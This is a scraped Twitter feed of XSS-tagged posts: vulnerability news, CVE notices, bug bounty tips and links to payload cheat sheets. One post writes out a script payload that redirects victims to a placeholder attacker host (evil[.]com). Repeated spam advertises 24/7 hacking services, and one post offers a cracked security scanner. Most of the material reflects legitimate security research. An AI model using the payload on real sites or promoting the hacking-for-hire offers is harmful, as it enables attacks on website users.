@Cybernozcoma year agoRadio silence from DMS vendor quartet over XSS zero-days https://t.co/lJwrMPrSJk #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoCheat-Sheets: https://t.co/RcXJbb1Vce https://t.co/G5QgJwYDKX https://t.co/aJp6crFinw
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoVulnexp 90 | Day25 XSS Cheat-Sheets ➡️Cheat-Sheets: ➡️Payloads: #bugbountytips #bugbountytip Thread 🧵 : 👇
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoRadio silence from DMS vendor quartet over XSS zero-days #cybersecurity #infosec https://t.co/MmsUw4MtbD
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🍕 Radio silence from DMS vendor quartet over XSS zero-days LINK: https://t.co/2S3pgdjPFD Source: The Daily Swig #infosec #networksecurity #redteam Interested in OffSec? 💪 @HackersFeed_io
![profile](https://pbs.twimg.com/profile_images/1490936144468770818/PfZYjq9E_normal.png)
Enciphers
@EnciphersLabsa year agoHere is a story of how a self XSS was turned into Stored XSS. https://t.co/je9lh8bRQ7 #webappsecurity #xss #PenetrationTesting #websecurity #cybersecurity #informationsecurity #blog #threats #vulnerability #enciphers #hacking #dataprotection #cybercrime #training #appsec https://t.co/y97OTmHtXA
![profile](https://pbs.twimg.com/profile_images/1475466784387915779/G7yqV0mH_normal.jpg)
Securzy
@SecurzyHQa year agoYesterday was a huge success! Thank you Rohit Gautam for an insightful webinar on #XSS Techniques & Automation for Bug Bounties. Participants learned valuable skills to improve their bug bounty game. Register at https://t.co/jCzDfyAUy6 for more such webinars! #BugBounty #Securzy https://t.co/EJ8Z6X5Wxi
![profile](https://pbs.twimg.com/profile_images/1621477987005628416/mtPhuxEo_normal.jpg)
HB HACKS
@Hb_Hacksa year agoHack Services available 24/7 Link: https://t.co/4aQu4aGQiA… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1621550242863742982/zQgY3-n5_normal.jpg)
hackwith_Roman🖥🛰📡
@RomanhacExpert1a year agoHack Services available 24/7 Link: https://t.co/3da2FxeJXV… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/ahTNbS8amw
![profile](https://pbs.twimg.com/profile_images/1620308287370706946/nr8342ln_normal.jpg)
Parvez Mosaraf
@mosaraf_babua year ago#BugBounty #Burpsuite #DAST #Pentesting #Plugins #offsec #seguridadinformtica #ethicalhacking #cwe #cve #owasp #ciberdefensa #cibercrimen #ciso #ciberseguridad #ciberataque #ciberdelincuentes #exploit #pentester #offsec #redteam #ctf #hacking #xss #sqli #LIE https://t.co/KVuYwBFc0p
![profile](https://pbs.twimg.com/profile_images/1608668518786166785/9pIxNLvB_normal.jpg)
Dharamveer prasad ( v_3_3_r )
@Dharamveer_____a year ago🔥XSS hunters, don't overlook the power of URL context! Many vulnerabilities can be found by testing payloads in URL parameters, so make sure to check this area thoroughly: #infosec #AppSec payload list: 👇
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🥪 New XSS Hunter host Truffle Security faces privacy backlash 👉 https://t.co/Hyacv87ZCH Source: The Daily Swig #hacking #cybersecurity #infosec #hack What do you think about it?
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoNew XSS Hunter host Truffle Security faces privacy backlash #cybersecurity #infosec https://t.co/VgOGrBhh1j
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoMultiple Document Management XSS Flaw Let Attackers Access Sensitive #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1540626470896541696/C-hRuRks_normal.jpg)
Br0k3n_1337
@Br0k3n_1337a year agoAlhamdulillah❤️ I earned $350 for my submission on @bugcrowd Tips: Immediately Retest your report after it gets resolved. #ItTakesACrowd #bugbountytip #bugbountytips #bugbounty #xss https://t.co/T4WjG7qABU
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0a year ago#NahamCon2022EU: I Hope This Sticks: Analyzing ClipboardEvent Listeners for XSS by spaceraccoon #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/2EY9VmWUTm
![profile](https://pbs.twimg.com/profile_images/1550997937223770112/Vuwd45Jf_normal.png)
Bug bounty notes
@bugbounty0a year agoVue JS Reflected XSS #bugbounty #bugbountytip #infosec #bugbountytips https://t.co/ut2WCgwTnC
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/IWSSjmgTOL
![profile](https://pbs.twimg.com/profile_images/1619695358476689409/rfMHBiR7_normal.jpg)
rohit_Kumar
@krrohit210302a year agoXss but duplicate 😞 #bugbounty https://t.co/URaTTalDjJ
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoWriteups List : • https://t.co/fy7X2Qpz16 • https://t.co/p1U60RMrlu
![profile](https://pbs.twimg.com/profile_images/1462716185271697409/tR-Y2ROB_normal.jpg)
Anukul Dhuriya
@AnukulHexxa year agoVulnexp 90 | Day24 XSS Write-ups ➡️Writeups List : #bugbountytips #bugbountytip Thread 🧵 : 👇 https://t.co/oS0UuUPcgX
![profile](https://pbs.twimg.com/profile_images/1583917642918039552/5NAyEOrW_normal.jpg)
Hardik Singh
@Kxddaha year agoI'm trying to bypass XSS filter on an application: 1. It strips away any instance of < > + 2. Input limited to 40 chars 3. It doesn't save if input has ' [ ] \ Input appears mostly in either <td>input</td> and <option>input</option> #infosec #bugbounty
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/igZsRmBH52
![profile](https://pbs.twimg.com/profile_images/1551189938779181058/v8GHcpBz_normal.jpg)
Coy Emerald 🇳🇬🇺🇦
@CoyEmerald1a year agoThere's a security vulnerability (bug) in this picture, can you spot it? (a) Sql Injection (b) Xss (c) (fill in this space with your answer) 😅 #security #vulnerabilitydisclosure #bugbountytips @CoyEmerald1 @HackenProof @Hacker0x01 @intigriti https://t.co/TJQezMh1GK
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Securitya year agoPopular keywords used with #vulnerability tweets Date: 2023-02-08 Unique Tweets: 321 TOP 10 KEYWORDS 1: Data 2: Cross 3: ESXiArgs 4: Site 5: Access 6: Vigil 7: US 8: CISA 9: XSS 10: Toyota bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1606561106524344320/Pk0lT02d_normal.jpg)
مهند 🐎 | Mohnad
@Mohnada year agoWhen pentester play Fivem then try to find some juicy Stored xss :) #bugbountytips #bugbountytip https://t.co/bMCfnHseB5
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/3viif3Zqg3
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/8fqasXXDDi
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year ago@bxsshunter is going open-source to ensure transparency & launching custom database integration for complete control of your data. Perfect for users who can't run custom instances. Get ready for this exciting update! (https://t.co/gjwNwSUa2N) #Cybersecurity #bugbountytips #xss https://t.co/CWNV91ubrr
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoJoin https://t.co/gjwNwSUa2N now to stay informed when we release our open-source software and receive a comprehensive guide on how to gain full control over your data through personalized database integration. This feature will be included in an upcoming update. #bugbountytips https://t.co/JUib9Yf7wp
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoThe #AWSVRP on #HackerOne now requires personal XSSHunter instances for reporting. We're providing open-source #BXSSHunter for the community & ability to integrate custom databases for full control over your data. Report vuln with peace of mind. #bugbountytips #cybersecurity https://t.co/pEjJmeNIUW
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoCritical XSS flaw in phpMyAdmin allows malicious database operations #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoExciting news! Following industry trends and valuable insights from @zseano, we've decided to open-source our @bxsshunter. This update will empower users to monitor their data by integrating their custom database. Stay tuned for more details on the release! #bugbountytips https://t.co/sxGMqpOKaa
![profile](https://pbs.twimg.com/profile_images/1068578743642349568/4Cqw0DvY_normal.jpg)
IICyberSecurity
@iicsorga year ago#infosec #cybersecurity Critical XSS flaw in phpMyAdmin allows malicious database operations https://t.co/sL6qLGvZQT https://t.co/Cp8kA6W4vI
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/P53eN5pXwq
![profile](https://pbs.twimg.com/profile_images/1557826721801437184/FVP5u7tF_normal.jpg)
abdulsec
@moodiAbdoula year ago@Masonhck3571 Smart way to automate blind xss discovery in all bugbounty Target but i prefer the self hosted https://t.co/FihoM3mhTv
![profile](https://pbs.twimg.com/profile_images/1615391817985294350/8siu4Qvd_normal.jpg)
bullsec
@bullsecsecurea year ago@cyberK9x On an educational note. Part of the skillset for a successful infosec person should be standing up basic infrastructure stuff (like XSS Hunter or Burp Collaborator), learn a lot about configuration and management and doing it on a VPS isolates you from an actual f**k up.
![profile](https://pbs.twimg.com/profile_images/1621521038562705414/87MH4YdX_normal.jpg)
cybercanine
@cyberK9xa year ago🚨 ALERT !! 🚨 Stop relying on third-party hosted XSS hunter instances! You never know what's being monitored and it's best to have full control over your testing environment.Invest in a $5 VPS and host your own instance for transparency & security. #bugbountytips #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1219143153871020032/3tvm-Zt7_normal.jpg)
Sathish M
@goldenrockers1a year ago@impratikdabhi @therceman @SaveToBookmarks #BugBounty #XSS
![profile](https://pbs.twimg.com/profile_images/1375217924017819649/7z5Z5mCF_normal.jpg)
Barbarosa
@Barbarossa0xa year agoThe vulnerability can be: - XSS - CSRF - DIRTY COOKIE - NEGOTIATE DOMAIN - NEGOTIATE HOST - NEGOTIATE PORT - NEGOTIATE PATH - NEGOTIATE PROTOCOL - NEGOTIATE PROTOCOL VERSION #infosec #CyberSec #Hacking #tryhackme
![profile](https://pbs.twimg.com/profile_images/1531334436800831488/evf2wJ4z_normal.jpg)
Filipi Pires
@FilipiPiresa year agophpMyAdmin Releases Software Update to Fix XSS Vulnerability https://t.co/L0H5kLbovZ #security #opensource #cybersecurity #malware #cyber #pentesting #malwareanalysis #infosec #redteam #malwarehunting #hacking #infosec #threathunting #bugbounty #tools #offensivesecurity
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_falla year agophpMyAdmin Releases Software Update to Fix XSS Vulnerability https://t.co/Jv59FsBMyc #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/1594050291770724353/hHWgJ3Th_normal.jpg)
Bug Zero
@BugZero_ioa year ago#BugZeroLightReading this week Tidbits of Cross-Site Scripting (XSS) Read: https://t.co/xrEUPwnloY #BugZero #BugBounty #SriLanka #BugZeroLightReading #BugBountyTips
![profile](https://pbs.twimg.com/profile_images/627732999161823232/QF5met-h_normal.jpg)
Hackers Online Club (HOC)
@HOCupdatea year agoHOCXSS — Automatic Cross-Site Scripting (#XSS) Vulnerability Scanner https://t.co/57RVqCEWTs Features : ● Automatic Parameters Detection ● Scan using TOR ● WAF Detection ● Multi-threaded Crawling ● Cookie Support #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoDOM XSS vulnerability in Gartner Peer Insights widget patched https://t.co/w5RyGx9Jr1 #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/792947851097575424/SyxYMTdQ_normal.jpg)
Hacker Spy Network
@HackerSpyNet1a year agoSignificance to “Not Set CSP” While Checking For XSS Vulnerabilities With XSpear? https://t.co/En6Gox8YW1
![profile](https://pbs.twimg.com/profile_images/1601131284083916801/j58cDDtG_normal.jpg)
ArcherL (@[email protected])
@realArcherLa year agoWould you be interested in receiving customized new letters from https://t.co/a9616mChCH? Like, get articles based only on #xss #csrf #web #idors? I am experimenting with ways I can make it sustainable; as of now, it runs on what I earn from my part time job. #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1617228299360694272/zaJtlBK2_normal.jpg)
Luthra
@justluthraa year agoI injected BXSS Payloads in 2020 but got XSS Fired Today #bugbounty #xsshunter https://t.co/Y67RsfNSW6
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🍟 DOM XSS vulnerability in Gartner Peer Insights widget patched LINK: https://t.co/tUwmvcUHQT Thanks The Daily Swig #infosec #networksecurity #redteam What do you think about it?
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoDOM XSS vulnerability in Gartner Peer Insights widget patched #cybersecurity #infosec https://t.co/W1K01FZK4q
![profile](https://pbs.twimg.com/profile_images/1543995467927027712/HZ1bs4IU_normal.jpg)
Begin n Bounty
@beginnbountya year ago🔥XSS hunters, don't overlook the power of URL context! Many vulnerabilities can be found by testing payloads in URL parameters, so make sure to check this area thoroughly: #infosec #AppSec payload list: 👇
![profile](https://pbs.twimg.com/profile_images/1613798309860196353/CBgJ9iKO_normal.jpg)
s3c
@s3c_krda year agoBounty of stored XSS by collaboration with @siratsami71 @moe1n1 @zhenwarx #BugBounty #togetherwehitharder https://t.co/7o7JBfZUwK
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/UssN7L9gDE
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami143a year ago### WAF / Cloudflare Bypass 20+ XSS Payloads #bugbountytips #BugBounty #bugbountytip #cybersecuritytips #cybersecurity #hacker #Hacking #infosecurity #infosec #xss https://t.co/wcsXYDATVX
![profile](https://pbs.twimg.com/profile_images/1546114295070482433/zr0FuLXf_normal.jpg)
Pratik Dabhi
@impratikdabhia year ago$350 XSS in 15 minutes by @therceman https://t.co/Hq05YoSkR4 #bugbounty #infosec #Hacking
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/x3uSpUR9tQ
![profile](https://pbs.twimg.com/profile_images/1601087793916248064/UBQ_bD2k_normal.jpg)
at0m
@atomiczseca year ago#BugBounty #bugbountytips #bugbountytip #xss #payload #payloads #bughunting #bugs #javascript
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/92U9qErSoB
![profile](https://pbs.twimg.com/profile_images/1600277408711680004/hFehNrzp_normal.jpg)
chosen negreaux americana
@TheDgtalEmpressa year agoWhat’s your fave security vulnerability to exploit red team? ❤️🔥 #CyberSecurity #infosec #redteam #hacking #sqlinjection #xss https://t.co/oNkyKw2Z7S
![profile](https://pbs.twimg.com/profile_images/1622340160112173056/myrVvUUF_normal.jpg)
0xSe.eK
@0se0eka year ago#100dayofbugbounty day01 (xss): 1)Read this blog: https://t.co/1FE3D4aWtk 2)hunting 3 hours and find 1 bugs but its duplicat 2)learn javascript language ------------ #bugbountytips #BugBounty #infosec #100DaysOfCode #100DaysOfCyberSecurity
![profile](https://pbs.twimg.com/profile_images/1621550091239657473/wq9S9buH_normal.jpg)
Hackwith_Garry 🖥🛰
@Experthac_Gary1a year agoHack Services available 24/7 Link: https://t.co/9H4AubCjDg… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/43LAeAnWWu
![profile](https://pbs.twimg.com/profile_images/1621550242863742982/zQgY3-n5_normal.jpg)
hackwith_Roman🖥🛰📡
@RomanhacExpert1a year agoHack Services available 24/7 Link: https://t.co/3da2FxeJXV… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/e4NfirdpfA
![profile](https://pbs.twimg.com/profile_images/1513609963431727107/fwWmlcsO_normal.jpg)
bounter
@_bughuntera year agoBlind XSS To SSRF 🔥🔥🔥🔥 https://t.co/mKiPbSHZQm #bugbountytips #bugbountytip #bugbounty
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year ago💣 XSS Hunter goes down Feb 11th! 🏆 Thank you @IAmMandatory for running it all these years! 👉 Build your own XSS Hunter w/ this easy script by @AdamJSturge: https://t.co/L9eq2fZiJL #xss #bugbountytips #bugbounty #hacking #infosec 👇🧵for more resources https://t.co/cpKMbtMHh2
![profile](https://pbs.twimg.com/profile_images/1332767878853091329/iqHqFeJ4_normal.png)
pandaquests (cute/cutie)
@pandaquestsa year agohttps://t.co/I9QUS39ZIX #xss #htmlinjection #javascript #cleancode #programming #programmer #coding #programmierung #hacking #web #code #codereview #computerscience #js #webdeveloper #webdevelopment #codingforbeginners #frontend #codenuggets #fyp #fy #pandaquests
![profile](https://pbs.twimg.com/profile_images/1601087793916248064/UBQ_bD2k_normal.jpg)
at0m
@atomiczseca year agoin the next couple days, I will be posting about my #XSS methodology and where I find most of them and how I found some. Stay tuned #bugbounty #bugbountytip #bugbountytips @trufflesec @XssHunter 🫡 https://t.co/w7viJQHzh0
![profile](https://pbs.twimg.com/profile_images/1369764815003136007/DX3xE5wp_normal.jpg)
khalil shreateh 🧢
@Shreateha year agohttps://t.co/fgwpcDRXBC #shreateh #exploit #hacker #computer #cybersecurity #blackleaders #technology #vulnerability #vulnerabilityisstrength #vulnerable #infosec #security #tech #hacking #programming #hackers #coding #safety #cybersec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoGreat news. new version of xss hunter. Link: https://t.co/at87pRp8MR #bugbountytips #xsshunter #xss #hacker #bugbounty https://t.co/U0CzmpwaYI
![profile](https://pbs.twimg.com/profile_images/1621829734358286336/_B4xi_5F_normal.jpg)
HeNews
@HeNews9a year agoThe course also covers web application hacking, discovering and exploiting vulnerabilities, and protecting against XSS and MITM attacks. Finally, the course covers social engineering techniques and malware analysis.
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Securitya year agoPopular keywords used with #vulnerability tweets Date: 2023-02-04 Unique Tweets: 210 TOP 10 KEYWORDS 1: Cross 2: Site 3: XSS 4: Scripting 5: GoAnywhere 6: MFT 7: CSRF 8: Fortra's 9: Injection 10: Vigil bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecuritya year agoWinning QR with DOM-Based XSS | Bug Bounty POC https://t.co/Lx1t1Ab4B1 #Pentesting #BugBounty #CyberSecurity #Infosec https://t.co/cpYAIRawQz
![profile](https://pbs.twimg.com/profile_images/1620175770260803584/LEhWGVwZ_normal.jpg)
Borna Nematzadeh
@LogicalHuntera year agoThe @trick3st is a better way to automate your recon workflow! Here's a simple workflow to find XSS vulnerability. It imports URLs from the input and uses both dalfox and nuclei-xss-templates (-tags xss) for scanning. #bugbounty #bugbountytips https://t.co/rfXZD9RpYK
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoPath based xss with diffrence type methods⚔️ 1: Inecject payload in every path and check xss 2: append fake paramters in every path and check xss vulnerability 3: made poc for you in your terminal https://t.co/82zFTiWWmg #infosec #bugbountytips #CyberSecurity https://t.co/BHuPzXuEiv
![profile](https://pbs.twimg.com/profile_images/1404125874350264322/6G0a9c7a_normal.jpg)
payloadartist
@payloadartista year ago⚙️ XSSHunter service is deprecated. Now what? 👇(1/2) @trufflesec launched a better version of it with more checks - CORS - Secrets on the page the payload fires - Exposed .git directory https://t.co/VPFRxraj6L #bugbounty #infosec #cybersecurity #redteam #bugbountytips https://t.co/NcTP4WGUKa
![profile](https://pbs.twimg.com/profile_images/1190552636782718976/yI0sJiOH_normal.jpg)
Rami (drunkrhin0)
@drunkrhin0a year agoYou're sleeping on this if you haven't read it yet 😴 ✅ DOM XSS ✅9+ entities affected ✅Detailed explanation (with diagrams too!) ✅PoC ✅ Absolute legend @justinsteven #bugbountytips https://t.co/Z41wr7GL6u
![profile](https://pbs.twimg.com/profile_images/1573743263689089024/W_n7aUJB_normal.jpg)
Ashish Dhone
@ashketchum_16a year agoHacked @Apple Teacher Learning Centre - ATLC 4th time ❤️ Bug: Bypass Blind XSS Bounty: $7500 Soon I'll be posting case study on my channels at, https://t.co/g1LMOhSQUH https://t.co/rRiWLQ7owA ./KEEP_hacking #apple #keep_hacking #news #media #BugBounty #hacker #HackerNews https://t.co/UqTRcrEmcT
![profile](https://pbs.twimg.com/profile_images/1434211180965347329/zxgxkrpz_normal.jpg)
r3kt
@iamR3KTa year ago@krishnsec and I collaborated on one program at @Bugcrowd through this I earned more than my one month salary in just 4 nights. Reported 10 Ref XSS 2 SSRFs etc Really learned new things from him new target - Hustle to earn my first 4 digit bounty. Improving in #BugBounty
![profile](https://pbs.twimg.com/profile_images/1606293148660944897/BxifR7s3_normal.jpg)
Manoj Khadka🇳🇵
@Manojkhda year agoWhen try some web put xss🐞payload then Boom!💥 with PoC ex payload: <script>window.location=”http://evil[.]com”;</script> #xss #bugbountytips https://t.co/vGDrJt3pQ0
![profile](https://pbs.twimg.com/profile_images/772040373778644997/qxorQMr4_normal.jpg)
Rey
@Rey_Nevana year ago@Infosec_Taylor There is a big difference between a pentest and looking for issues on a website. So it really depends if we speak missing encryption, xss, or sql injection. Just like in the strip club, looky looky but no touchy touchy
![profile](https://pbs.twimg.com/profile_images/1301206555338051584/nUAnAMr9_normal.jpg)
Hacking Articles
@hackinarticlesa year agoComprehensive Guide on Cross-Site Scripting (XSS) https://t.co/bF8HmpQ7pc #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cissp #CyberSec #networking #networksecurity #CheatSheet #infosecurity #cyberattacks #bugbounty #bugbountytips https://t.co/draWLOf1Oj
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoDOM-Based XSS for fun and profit $$$! | Bug Bounty POC https://t.co/OK9tBqCb1N #infosec #cyberattack #cybersecurity #bugbounty #bugbountytip #hacking
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0608): Cross-site Scripting (XSS) - DOM in microweber/microweber. https://t.co/zF4lKUoOTq Disclosed by https://t.co/bYpI4eoNDU, fixed by microweber maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0607): Cross-site Scripting (XSS) - Stored in projectsend/projectsend. https://t.co/aK4e96vmtK Disclosed by @@d47sec, fixed by projectsend maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1601815160380788738/AMiNgyjg_normal.jpg)
Abhishek Meena
@Aacle_a year ago✨Bug Bounty Pro Tip: ➡Escalate everything you find! #bugbounty #Infosec #hacking • Don’t report SSRF, Escalate to RCE. • Don’t report Self-XSS, Chain it with Clickjacking. • Don’t report Self-Stored XSS, Chain it with CSRF. More🧵(1/n) : 👇 https://t.co/4NHJzEtXU5
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ Acunetix Premium 15.3.230123162 Full Activated – Discount 100% OFF https://t.co/Joixus9aMb Link : https://t.co/kvz50QYeZl #Acunetix #HackerOne #Hackers #Synack #BugCrowd #XSS #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #HackerNews https://t.co/8SGqMWgvCD
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/DKV5D94Bg6 Stars: 9 Watching: 0 Last change: Aug 8, 2021 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/0XV9h5Bcwq Stars: 869 Watching: 28 Last change: Oct 31, 2022 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0606): Cross-site Scripting (XSS) - Reflected in ampache/ampache. https://t.co/nhgZcnUkD7 Disclosed by https://t.co/dmte2VSaRV, fixed by @ampache... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1593618264512503809/2aZnRgly_normal.jpg)
0ha€ck^
@mrzip2zipa year agoThe best extension in browser to found xss, sql , encode; decode payload and more https://t.co/NfBsFo4gpJ ——— #bugbountytips #BugBounty #infosec #cybersecurite #Pentesting #Hacked #bugcrowd https://t.co/urDpY0MScX
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoXSS, Flash Cross-Domain Policy, and CSRF Vulnerabilities Discovered on a Single Website https://t.co/SGHtOv29OW #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
